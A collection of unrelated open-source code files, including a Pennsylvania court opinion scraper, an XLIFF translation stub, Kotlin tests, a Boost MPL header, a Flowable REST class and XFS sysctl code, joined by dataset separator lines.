from juriscraper.lib.string_utils import convert_date_string
from juriscraper.lib.string_utils import clean_string
class Site(OpinionSite):
    """Scraper for the Pennsylvania Supreme Court RSS opinion feed.

    Parses each qualifying RSS <item> into a case dict (name, date,
    docket, judge, url) and exposes the columns through the _get_*
    accessors that OpinionSite expects.
    """

    def __init__(self, *args, **kwargs):
        super(Site, self).__init__(*args, **kwargs)
        self.court_id = self.__module__
        # Placeholder until set_regex() below compiles the real pattern.
        self.regex = False
        self.url = "http://www.pacourts.us/assets/rss/SupremeOpinionsRss.ashx"
        # Group 1: case name; group 2: docket number(s) following "No."/"Nos.".
        self.set_regex(r"(.*)(?:[,-]?\s+Nos?\.)(.*)")
        # XPath: skip Judgment List / Reargument Table items; keep only
        # items whose title carries a docket marker ("No.").
        self.base = (
            "//item[not(contains(title/text(), 'Judgment List'))]"
            "[not(contains(title/text(), 'Reargument Table'))]"
            "[contains(title/text(), 'No.')]"
        )
        self.cases = []

    def _download(self, request_dict={}):
        # NOTE(review): mutable default argument is shared across calls;
        # kept as-is to match the parent class signature.
        html = super(Site, self)._download(request_dict)
        self._extract_case_data_from_html(html)
        return html

    def _extract_case_data_from_html(self, html):
        """Populate self.cases from the feed's matching <item> elements."""
        for item in html.xpath(self.base):
            creator = item.xpath("./creator")[0].text_content()
            pubdate = item.xpath("./pubdate")[0].text_content()
            pubdate_sanitized = self.sanitize_text(pubdate)
            title = item.xpath("./title")[0].text_content()
            title_sanitized = self.sanitize_text(title)
            title_clean = clean_string(title_sanitized)
            search = self.regex.search(title_clean)
            url = item.xpath(".//@href")[0]
            if search:
                name = search.group(1)
                docket = search.group(2)
            else:
                # Title lacked a docket number; derive it from the PDF URL.
                name = title_clean
                docket = self._extract_docket_from_url(url)
            self.cases.append(
                {
                    "name": name,
                    "date": convert_date_string(pubdate_sanitized),
                    "docket": docket,
                    "judge": self.sanitize_text(creator),
                    "url": url,
                }
            )

    def _extract_docket_from_url(self, url):
        """Sometimes the court doesn't include the docket number in the title,
        in which case we need to derive it based on the opinion url (it is
        included in the PDF file name)
        """
        # File name looks like "<number>CD<2-digit-year>_...": split on "CD".
        parts = url.split("/")[-1].split("CD")
        number = parts[0]
        year_suffix_text = parts[1].split("_")[0]
        year_suffix = re.sub(
            "[^0-9]", "", year_suffix_text
        )  # Strip non-numeric characters
        return "%s C.D. 20%s" % (number, year_suffix)

    def _get_case_names(self):
        return [case["name"] for case in self.cases]

    def _get_download_urls(self):
        return [case["url"] for case in self.cases]

    def _get_case_dates(self):
        return [case["date"] for case in self.cases]

    def _get_precedential_statuses(self):
        # The feed carries only published opinions, one status per case.
        return ["Published"] * len(self.cases)

    def _get_docket_numbers(self):
        return [case["docket"] for case in self.cases]

    def _get_judges(self):
        return [case["judge"] for case in self.cases]

    def sanitize_text(self, text):
        """Normalize feed text: literal "\\n" sequences become newlines and
        en-dashes become plain hyphens."""
        text = clean_string(text)
        return text.replace(r"\n", "\n").replace(u"–", "-")

    def set_regex(self, pattern):
        # Compile and store the title-splitting pattern used above.
        self.regex = re.compile(pattern)
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xliff PUBLIC "-//XLIFF//DTD XLIFF//EN" "http://www.oasis-open.org/committees/xliff/documents/xliff.dtd">
<xliff version="1.0">
<file source-language="en" target-language="he" datatype="plaintext" original="messages" date="2018-09-09T08:23:38Z" product-name="messages">
<header/>
<body>
<trans-unit id="1">
<source>Group %1%</source>
<target/>
</trans-unit>
<trans-unit id="2">
<source>Main area</source>
<target/>
</trans-unit>
<trans-unit id="3">
<source>Cancel</source>
<target/>
</trans-unit>
<trans-unit id="4">
<source>Save</source>
<target/>
</trans-unit>
<trans-unit id="5">
<source>Create</source>
<target/>
</trans-unit>
<trans-unit id="6">
<source>All %1%</source>
<target/>
</trans-unit>
<trans-unit id="7">
<source>All privileges</source>
<target/>
</trans-unit>
<trans-unit id="8">
<source>Are you sure you want to delete %1%?</source>
<target/>
</trans-unit>
<trans-unit id="9">
<source>Delete</source>
<target/>
</trans-unit>
<trans-unit id="10">
<source>Edit %1% permissions</source>
<target/>
</trans-unit>
<trans-unit id="11">
<source>Edit permissions</source>
<target/>
</trans-unit>
<trans-unit id="12">
<source>Add permissions by %1%</source>
<target/>
</trans-unit>
<trans-unit id="13">
<source>Add %1%</source>
<target/>
</trans-unit>
<trans-unit id="14">
<source>%1% name</source>
<target/>
</trans-unit>
<trans-unit id="15">
<source>Action</source>
<target/>
</trans-unit>
<trans-unit id="16">
<source>Permissions</source>
<target/>
</trans-unit>
<trans-unit id="17">
<source>Grant</source>
<target/>
</trans-unit>
<trans-unit id="18">
<source>Deny</source>
<target/>
</trans-unit>
<trans-unit id="19">
<source>Inherit</source>
<target/>
</trans-unit>
<trans-unit id="20">
<source>Taxonomy: %1%</source>
<target/>
</trans-unit>
<trans-unit id="21">
<source>%1%: %2%</source>
<target/>
</trans-unit>
<trans-unit id="22">
<source>Permission</source>
<target/>
</trans-unit>
<trans-unit id="23">
<source>Edit %1% permissions of %2%</source>
<target/>
</trans-unit>
<trans-unit id="24">
<source>Permissions for all %1%</source>
<target/>
</trans-unit>
<trans-unit id="25">
<source>Permissions by taxonomy</source>
<target/>
</trans-unit>
<trans-unit id="26">
<source>Taxonomy name</source>
<target/>
</trans-unit>
<trans-unit id="27">
<source>Add permissions by taxonomy</source>
<target/>
</trans-unit>
<trans-unit id="28">
<source>Add taxonomy</source>
<target/>
</trans-unit>
<trans-unit id="29">
<source>Group details</source>
<target/>
</trans-unit>
<trans-unit id="30">
<source>Name</source>
<target/>
</trans-unit>
<trans-unit id="31">
<source>Description</source>
<target/>
</trans-unit>
<trans-unit id="32">
<source>Translate</source>
<target/>
</trans-unit>
<trans-unit id="33">
<source>List groups</source>
<target/>
</trans-unit>
<trans-unit id="34">
<source>Group</source>
<target/>
</trans-unit>
<trans-unit id="35">
<source>Members</source>
<target/>
</trans-unit>
<trans-unit id="36">
<source>Add new</source>
<target/>
</trans-unit>
<trans-unit id="37">
<source>Edit</source>
<target/>
</trans-unit>
<trans-unit id="38">
<source>Return to group list</source>
<target/>
</trans-unit>
<trans-unit id="39">
<source>Permissions by %1%</source>
<target/>
</trans-unit>
</body>
</file>
</xliff>
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2018 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.samples.apps.iosched.ui.signin
import android.net.Uri
import androidx.arch.core.executor.testing.InstantTaskExecutorRule
import com.google.samples.apps.iosched.androidtest.util.LiveDataTestUtil
import com.google.samples.apps.iosched.androidtest.util.observeForTesting
import com.google.samples.apps.iosched.shared.data.signin.AuthenticatedUserInfoBasic
import com.google.samples.apps.iosched.shared.domain.auth.ObserveUserAuthStateUseCase
import com.google.samples.apps.iosched.shared.domain.prefs.NotificationsPrefIsShownUseCase
import com.google.samples.apps.iosched.shared.result.Result
import com.google.samples.apps.iosched.test.data.CoroutineScope
import com.google.samples.apps.iosched.test.data.MainCoroutineRule
import com.google.samples.apps.iosched.test.data.runBlockingTest
import com.google.samples.apps.iosched.test.util.fakes.FakePreferenceStorage
import com.google.samples.apps.iosched.ui.schedule.FakeObserveUserAuthStateUseCase
import com.nhaarman.mockito_kotlin.doReturn
import com.nhaarman.mockito_kotlin.mock
import junit.framework.TestCase.assertEquals
import junit.framework.TestCase.assertFalse
import kotlinx.coroutines.CoroutineDispatcher
import org.junit.Assert.assertTrue
import org.junit.Rule
import org.junit.Test
/**
* Tests for [FirebaseSignInViewModelDelegate]
*/
class FirebaseSignInViewModelDelegateTest {
// Executes tasks in the Architecture Components in the same thread
@get:Rule
var instantTaskExecutorRule = InstantTaskExecutorRule()
// Overrides Dispatchers.Main used in Coroutines
@get:Rule
var coroutineRule = MainCoroutineRule()
@Test
fun testSignedOut() = coroutineRule.runBlockingTest {
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(null),
isRegistered = Result.Success(false),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
)
subject.currentUserInfo.observeForTesting {
val currentFirebaseUser = LiveDataTestUtil.getValue(subject.currentUserInfo)
assertEquals(
null,
currentFirebaseUser?.getUid()
)
assertEquals(
null,
LiveDataTestUtil.getValue(subject.currentUserImageUri)
)
assertFalse(subject.isSignedIn())
}
}
@Test
fun testSignedInRegistered() = coroutineRule.runBlockingTest {
val user = mock<AuthenticatedUserInfoBasic> {
on { getUid() }.doReturn("123")
on { getPhotoUrl() }.doReturn(mock<Uri> {})
on { isSignedIn() }.doReturn(true)
}
val fakeObserveUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(user),
isRegistered = Result.Success(true),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = fakeObserveUserAuthStateUseCase
)
// Observe signIn and registeredUser so messages are received
subject.observeSignedInUser().observeForever { }
subject.observeRegisteredUser().observeForever { }
assertEquals(
user.getUid(),
LiveDataTestUtil.getValue(subject.currentUserInfo)?.getUid()
)
assertEquals(
user.getPhotoUrl(),
LiveDataTestUtil.getValue(subject.currentUserImageUri)
)
assertTrue(subject.isSignedIn())
assertTrue(subject.isRegistered())
}
@Test
fun testSignedInNotRegistered() = coroutineRule.runBlockingTest {
val user = mock<AuthenticatedUserInfoBasic> {
on { getUid() }.doReturn("123")
on { getPhotoUrl() }.doReturn(mock<Uri> {})
on { isSignedIn() }.doReturn(true)
}
val fakeObserveUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(user),
isRegistered = Result.Success(false),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = fakeObserveUserAuthStateUseCase
)
// Observe signIn and registeredUser so messages are received
subject.observeSignedInUser().observeForever { }
subject.observeRegisteredUser().observeForever { }
assertEquals(
user.getUid(),
LiveDataTestUtil.getValue(subject.currentUserInfo)?.getUid()
)
assertEquals(
user.getPhotoUrl(),
LiveDataTestUtil.getValue(subject.currentUserImageUri)
)
assertTrue(subject.isSignedIn())
assertFalse(subject.isRegistered())
}
@Test
fun testPostSignIn() = coroutineRule.runBlockingTest {
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(null),
isRegistered = Result.Success(false),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
)
subject.emitSignInRequest()
// Check that the emitted event is a sign in request
assertEquals(
LiveDataTestUtil.getValue(subject.performSignInEvent)?.peekContent(),
SignInEvent.RequestSignIn
)
}
@Test
fun testPostSignOut() = coroutineRule.runBlockingTest {
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(null),
isRegistered = Result.Success(false),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
)
subject.emitSignOutRequest()
assertEquals(
LiveDataTestUtil.getValue(subject.performSignInEvent)?.peekContent(),
SignInEvent.RequestSignOut
)
}
private fun createNotificationsPrefIsShownUseCase(): NotificationsPrefIsShownUseCase {
return NotificationsPrefIsShownUseCase(
FakePreferenceStorage(),
coroutineRule.testDispatcher
)
}
private fun createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase: ObserveUserAuthStateUseCase =
FakeObserveUserAuthStateUseCase(
user = Result.Success(null),
isRegistered = Result.Success(true),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher),
notificationsPrefIsShownUseCase: NotificationsPrefIsShownUseCase =
createNotificationsPrefIsShownUseCase(),
ioDispatcher: CoroutineDispatcher = coroutineRule.testDispatcher,
mainDispatcher: CoroutineDispatcher = coroutineRule.testDispatcher,
isReservationEnabledByRemoteConfig: Boolean = true
): FirebaseSignInViewModelDelegate {
return FirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase,
notificationsPrefIsShownUseCase,
ioDispatcher,
mainDispatcher,
isReservationEnabledByRemoteConfig
)
}
}
| {
"pile_set_name": "Github"
} |
// Compiled swig template: renders "<h1>Bar</h1>" when the context (or, as a
// fallback, the global scope) defines a truthy `foo`, else "<h1></h1>".
function anonymous(_swig, _ctx, _filters, _utils, _fn) {
    var _ext = _swig.extensions;
    var fooValue;
    if (typeof _ctx.foo !== "undefined") {
        fooValue = _ctx.foo;
    } else if (typeof foo !== "undefined") {
        fooValue = foo;
    } else {
        fooValue = "";
    }
    var output = "<h1>";
    if (fooValue) {
        output += "Bar";
    }
    output += "</h1>";
    return output;
}
"pile_set_name": "Github"
} |
package net.corda.testing.internal.db
import org.junit.jupiter.api.Test
@GroupB
class GroupBTests {

    // Registers, in order, the setup/teardown SQL script names the asserting
    // database context should expect to see for this test group.
    @Test()
    fun setExpectations() {
        AssertingTestDatabaseContext.addExpectations("groupB",
                "forClassGroupBTests-setup", "specialSql1-setup", "specialSql1-teardown", "forClassGroupBTests-teardown")
    }

    // Intentionally empty: exercises only the per-class setup/teardown.
    @Test()
    fun noSpecialSqlRequired() {
    }

    // Intentionally empty: the @SpecialSql1 annotation should additionally
    // trigger the specialSql1 setup/teardown scripts.
    @Test()
    @SpecialSql1
    fun someSpecialSqlRequired() {
    }
}
"pile_set_name": "Github"
} |
package MyTest::Constants;

# Test-library constants, declared one per line for readability.
# (Equivalent to the single hash-form `use constant { ... }` declaration.)
use constant LIBRARY_CONST1 => 1;
use constant LIBRARY_CONST2 => 1;
use constant LIBRARY_CONST3 => 42;
use constant LIBRARY_CONST4 => 42;

1;
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<vector xmlns:android="http://schemas.android.com/apk/res/android" android:height="24dp" android:viewportHeight="24.0" android:viewportWidth="24.0" android:width="24dp">
<path android:fillColor="#FFFFFF" android:pathData="M9,16.2L4.8,12l-1.4,1.4L9,19 21,7l-1.4,-1.4L9,16.2z"/>
</vector>
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2008
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// *Preprocessed* version of the main "apply_wrap.hpp" header
// -- DO NOT modify by hand!
namespace autoboost { namespace mpl {
template<
int N, typename F
>
struct apply_wrap_impl0;
// NOTE(review): this is a preprocessed, machine-generated boost.MPL header
// ("DO NOT modify by hand" per the file banner) -- comments only here.
// Borland C++Builder workaround: the primary template instantiates the nested
// template form F::template apply<na>; the true-specialization is chosen when
// F has a plain (non-template) nested `apply` type instead.
template< typename F, bool F_has_apply >
struct apply_wrap_impl0_bcb {
    typedef typename F::template apply<na> type;
};

template< typename F >
struct apply_wrap_impl0_bcb< F,true > {
    typedef typename F::apply type;
};
template<
typename F
>
struct apply_wrap_impl0<
0
, F
>
{
typedef apply_wrap_impl0_bcb< F, aux::has_apply<F>::value >::type type;
};
template<
typename F
>
struct apply_wrap_impl0<
1
, F
>
{
typedef typename F::template apply<
na
> type;
};
template<
typename F
>
struct apply_wrap_impl0<
2
, F
>
{
typedef typename F::template apply<
na, na
> type;
};
template<
typename F
>
struct apply_wrap_impl0<
3
, F
>
{
typedef typename F::template apply<
na, na, na
> type;
};
template<
typename F
>
struct apply_wrap_impl0<
4
, F
>
{
typedef typename F::template apply<
na, na, na, na
> type;
};
template<
typename F
>
struct apply_wrap_impl0<
5
, F
>
{
typedef typename F::template apply<
na, na, na, na, na
> type;
};
template<
typename F
>
struct apply_wrap0
: apply_wrap_impl0<
::autoboost::mpl::aux::arity< F,0 >::value
, F
>::type
{
};
template<
int N, typename F, typename T1
>
struct apply_wrap_impl1;
template<
typename F, typename T1
>
struct apply_wrap_impl1<
1
, F
, T1
>
{
typedef typename F::template apply<
T1
> type;
};
template<
typename F, typename T1
>
struct apply_wrap_impl1<
2
, F
, T1
>
{
typedef typename F::template apply<
T1
, na
> type;
};
template<
typename F, typename T1
>
struct apply_wrap_impl1<
3
, F
, T1
>
{
typedef typename F::template apply<
T1
, na, na
> type;
};
template<
typename F, typename T1
>
struct apply_wrap_impl1<
4
, F
, T1
>
{
typedef typename F::template apply<
T1
, na, na, na
> type;
};
template<
typename F, typename T1
>
struct apply_wrap_impl1<
5
, F
, T1
>
{
typedef typename F::template apply<
T1
, na, na, na, na
> type;
};
template<
typename F, typename T1
>
struct apply_wrap1
: apply_wrap_impl1<
::autoboost::mpl::aux::arity< F,1 >::value
, F
, T1
>::type
{
};
template<
int N, typename F, typename T1, typename T2
>
struct apply_wrap_impl2;
template<
typename F, typename T1, typename T2
>
struct apply_wrap_impl2<
2
, F
, T1, T2
>
{
typedef typename F::template apply<
T1, T2
> type;
};
template<
typename F, typename T1, typename T2
>
struct apply_wrap_impl2<
3
, F
, T1, T2
>
{
typedef typename F::template apply<
T1, T2
, na
> type;
};
template<
typename F, typename T1, typename T2
>
struct apply_wrap_impl2<
4
, F
, T1, T2
>
{
typedef typename F::template apply<
T1, T2
, na, na
> type;
};
template<
typename F, typename T1, typename T2
>
struct apply_wrap_impl2<
5
, F
, T1, T2
>
{
typedef typename F::template apply<
T1, T2
, na, na, na
> type;
};
template<
typename F, typename T1, typename T2
>
struct apply_wrap2
: apply_wrap_impl2<
::autoboost::mpl::aux::arity< F,2 >::value
, F
, T1, T2
>::type
{
};
template<
int N, typename F, typename T1, typename T2, typename T3
>
struct apply_wrap_impl3;
template<
typename F, typename T1, typename T2, typename T3
>
struct apply_wrap_impl3<
3
, F
, T1, T2, T3
>
{
typedef typename F::template apply<
T1, T2, T3
> type;
};
template<
typename F, typename T1, typename T2, typename T3
>
struct apply_wrap_impl3<
4
, F
, T1, T2, T3
>
{
typedef typename F::template apply<
T1, T2, T3
, na
> type;
};
template<
typename F, typename T1, typename T2, typename T3
>
struct apply_wrap_impl3<
5
, F
, T1, T2, T3
>
{
typedef typename F::template apply<
T1, T2, T3
, na, na
> type;
};
template<
typename F, typename T1, typename T2, typename T3
>
struct apply_wrap3
: apply_wrap_impl3<
::autoboost::mpl::aux::arity< F,3 >::value
, F
, T1, T2, T3
>::type
{
};
template<
int N, typename F, typename T1, typename T2, typename T3, typename T4
>
struct apply_wrap_impl4;
template<
typename F, typename T1, typename T2, typename T3, typename T4
>
struct apply_wrap_impl4<
4
, F
, T1, T2, T3, T4
>
{
typedef typename F::template apply<
T1, T2, T3, T4
> type;
};
template<
typename F, typename T1, typename T2, typename T3, typename T4
>
struct apply_wrap_impl4<
5
, F
, T1, T2, T3, T4
>
{
typedef typename F::template apply<
T1, T2, T3, T4
, na
> type;
};
template<
typename F, typename T1, typename T2, typename T3, typename T4
>
struct apply_wrap4
: apply_wrap_impl4<
::autoboost::mpl::aux::arity< F,4 >::value
, F
, T1, T2, T3, T4
>::type
{
};
template<
int N, typename F, typename T1, typename T2, typename T3, typename T4
, typename T5
>
struct apply_wrap_impl5;
template<
typename F, typename T1, typename T2, typename T3, typename T4
, typename T5
>
struct apply_wrap_impl5<
5
, F
, T1, T2, T3, T4, T5
>
{
typedef typename F::template apply<
T1, T2, T3, T4, T5
> type;
};
template<
typename F, typename T1, typename T2, typename T3, typename T4
, typename T5
>
struct apply_wrap5
: apply_wrap_impl5<
::autoboost::mpl::aux::arity< F,5 >::value
, F
, T1, T2, T3, T4, T5
>::type
{
};
}}
| {
"pile_set_name": "Github"
} |
/* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.flowable.eventregistry.rest.service.api.repository;
import java.io.InputStream;
import java.util.List;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.io.IOUtils;
import org.apache.http.entity.ContentType;
import org.flowable.common.engine.api.FlowableException;
import org.flowable.common.engine.api.FlowableIllegalArgumentException;
import org.flowable.common.engine.api.FlowableObjectNotFoundException;
import org.flowable.common.rest.resolver.ContentTypeResolver;
import org.flowable.eventregistry.api.EventDeployment;
import org.flowable.eventregistry.api.EventRepositoryService;
import org.flowable.eventregistry.rest.service.api.EventRegistryRestApiInterceptor;
import org.springframework.beans.factory.annotation.Autowired;
/**
* @author Tijs Rademakers
*/
/**
 * Shared logic for deployment-resource REST endpoints: resolves a named
 * resource inside an event deployment, sets the HTTP content type on the
 * response, and returns the resource's raw bytes.
 *
 * @author Tijs Rademakers
 */
public class BaseDeploymentResourceDataResource {

    @Autowired
    protected ContentTypeResolver contentTypeResolver;

    @Autowired
    protected EventRepositoryService repositoryService;

    @Autowired(required=false)
    protected EventRegistryRestApiInterceptor restApiInterceptor;

    /**
     * Returns the raw bytes of {@code resourceName} within the deployment
     * {@code deploymentId}, setting the resolved content type on
     * {@code response}.
     *
     * @throws FlowableIllegalArgumentException if either id is {@code null}
     * @throws FlowableObjectNotFoundException if the deployment or the
     *         resource does not exist
     * @throws FlowableException if the resource stream cannot be read
     */
    protected byte[] getDeploymentResourceData(String deploymentId, String resourceName, HttpServletResponse response) {

        if (deploymentId == null) {
            throw new FlowableIllegalArgumentException("No deployment id provided");
        }
        if (resourceName == null) {
            throw new FlowableIllegalArgumentException("No resource name provided");
        }

        // Check if deployment exists
        EventDeployment deployment = repositoryService.createDeploymentQuery().deploymentId(deploymentId).singleResult();
        if (deployment == null) {
            throw new FlowableObjectNotFoundException("Could not find a deployment with id '" + deploymentId + "'.", EventDeployment.class);
        }

        if (restApiInterceptor != null) {
            restApiInterceptor.accessDeploymentById(deployment);
        }

        List<String> resourceList = repositoryService.getDeploymentResourceNames(deploymentId);

        if (resourceList.contains(resourceName)) {
            // Event registry definition files (.event/.channel) are JSON;
            // anything else is resolved from the file extension.
            String contentType;
            if (resourceName.toLowerCase().endsWith(".event") || resourceName.toLowerCase().endsWith(".channel")) {
                contentType = ContentType.APPLICATION_JSON.getMimeType();
            } else {
                contentType = contentTypeResolver.resolveContentType(resourceName);
            }
            response.setContentType(contentType);

            // try-with-resources: the original implementation never closed
            // the stream, leaking it on both success and failure paths.
            try (InputStream resourceStream = repositoryService.getResourceAsStream(deploymentId, resourceName)) {
                return IOUtils.toByteArray(resourceStream);
            } catch (Exception e) {
                throw new FlowableException("Error converting resource stream", e);
            }

        } else {
            // Resource not found in deployment
            throw new FlowableObjectNotFoundException("Could not find a resource with name '" + resourceName + "' in deployment '" + deploymentId + "'.", String.class);
        }
    }
}
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0
/*
* Copyright (c) 2001-2005 Silicon Graphics, Inc.
* All Rights Reserved.
*/
#include "xfs.h"
#include <linux/sysctl.h>
#include <linux/proc_fs.h>
#include "xfs_error.h"
#include "xfs_stats.h"
static struct ctl_table_header *xfs_table_header;
#ifdef CONFIG_PROC_FS
/*
 * /proc/sys handler for fs.xfs.stats_clear.  Delegates range checking to
 * proc_dointvec_minmax(); on a successful write of a non-zero value it
 * clears all XFS statistics counters and resets the flag to zero, so the
 * sysctl acts as a one-shot trigger rather than persistent state.
 */
STATIC int
xfs_stats_clear_proc_handler(
	struct ctl_table	*ctl,
	int			write,
	void __user		*buffer,
	size_t			*lenp,
	loff_t			*ppos)
{
	int		ret, *valp = ctl->data;

	ret = proc_dointvec_minmax(ctl, write, buffer, lenp, ppos);

	if (!ret && write && *valp) {
		xfs_stats_clearall(xfsstats.xs_stats);
		xfs_stats_clear = 0;
	}

	return ret;
}
/*
 * /proc/sys handler for fs.xfs.panic_mask.  Delegates range checking to
 * proc_dointvec_minmax(); on a successful write it mirrors the new value
 * into the global xfs_panic_mask.  DEBUG builds additionally force the
 * corrupt-shutdown and log-reservation panic tags on.
 */
STATIC int
xfs_panic_mask_proc_handler(
	struct ctl_table	*ctl,
	int			write,
	void __user		*buffer,
	size_t			*lenp,
	loff_t			*ppos)
{
	int		ret, *valp = ctl->data;

	ret = proc_dointvec_minmax(ctl, write, buffer, lenp, ppos);
	if (!ret && write) {
		xfs_panic_mask = *valp;
#ifdef DEBUG
		xfs_panic_mask |= (XFS_PTAG_SHUTDOWN_CORRUPT | XFS_PTAG_LOGRES);
#endif
	}
	return ret;
}
#endif /* CONFIG_PROC_FS */
static struct ctl_table xfs_table[] = {
{
.procname = "irix_sgid_inherit",
.data = &xfs_params.sgid_inherit.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.sgid_inherit.min,
.extra2 = &xfs_params.sgid_inherit.max
},
{
.procname = "irix_symlink_mode",
.data = &xfs_params.symlink_mode.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.symlink_mode.min,
.extra2 = &xfs_params.symlink_mode.max
},
{
.procname = "panic_mask",
.data = &xfs_params.panic_mask.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = xfs_panic_mask_proc_handler,
.extra1 = &xfs_params.panic_mask.min,
.extra2 = &xfs_params.panic_mask.max
},
{
.procname = "error_level",
.data = &xfs_params.error_level.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.error_level.min,
.extra2 = &xfs_params.error_level.max
},
{
.procname = "xfssyncd_centisecs",
.data = &xfs_params.syncd_timer.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.syncd_timer.min,
.extra2 = &xfs_params.syncd_timer.max
},
{
.procname = "inherit_sync",
.data = &xfs_params.inherit_sync.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_sync.min,
.extra2 = &xfs_params.inherit_sync.max
},
{
.procname = "inherit_nodump",
.data = &xfs_params.inherit_nodump.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_nodump.min,
.extra2 = &xfs_params.inherit_nodump.max
},
{
.procname = "inherit_noatime",
.data = &xfs_params.inherit_noatim.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_noatim.min,
.extra2 = &xfs_params.inherit_noatim.max
},
{
.procname = "inherit_nosymlinks",
.data = &xfs_params.inherit_nosym.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_nosym.min,
.extra2 = &xfs_params.inherit_nosym.max
},
{
.procname = "rotorstep",
.data = &xfs_params.rotorstep.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.rotorstep.min,
.extra2 = &xfs_params.rotorstep.max
},
{
.procname = "inherit_nodefrag",
.data = &xfs_params.inherit_nodfrg.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_nodfrg.min,
.extra2 = &xfs_params.inherit_nodfrg.max
},
{
.procname = "filestream_centisecs",
.data = &xfs_params.fstrm_timer.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.fstrm_timer.min,
.extra2 = &xfs_params.fstrm_timer.max,
},
{
.procname = "speculative_prealloc_lifetime",
.data = &xfs_params.eofb_timer.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.eofb_timer.min,
.extra2 = &xfs_params.eofb_timer.max,
},
{
.procname = "speculative_cow_prealloc_lifetime",
.data = &xfs_params.cowb_timer.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.cowb_timer.min,
.extra2 = &xfs_params.cowb_timer.max,
},
/* please keep this the last entry */
#ifdef CONFIG_PROC_FS
{
.procname = "stats_clear",
.data = &xfs_params.stats_clear.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = xfs_stats_clear_proc_handler,
.extra1 = &xfs_params.stats_clear.min,
.extra2 = &xfs_params.stats_clear.max
},
#endif /* CONFIG_PROC_FS */
{}
};
static struct ctl_table xfs_dir_table[] = {
{
.procname = "xfs",
.mode = 0555,
.child = xfs_table
},
{}
};
static struct ctl_table xfs_root_table[] = {
{
.procname = "fs",
.mode = 0555,
.child = xfs_dir_table
},
{}
};
/*
 * Register the fs/xfs sysctl tree.  Returns 0 on success, or -ENOMEM if
 * the sysctl core could not register the table.
 */
int
xfs_sysctl_register(void)
{
	xfs_table_header = register_sysctl_table(xfs_root_table);
	return xfs_table_header ? 0 : -ENOMEM;
}
/* Tear down the sysctl tree registered by xfs_sysctl_register(). */
void
xfs_sysctl_unregister(void)
{
	unregister_sysctl_table(xfs_table_header);
}
| {
"pile_set_name": "Github"
} |
"use strict";
var _ = require('lodash'),
nanoscope = require('../index'),
PathLens = nanoscope.PathLens,
headLens = nanoscope.headLens,
utils = require('./utils');
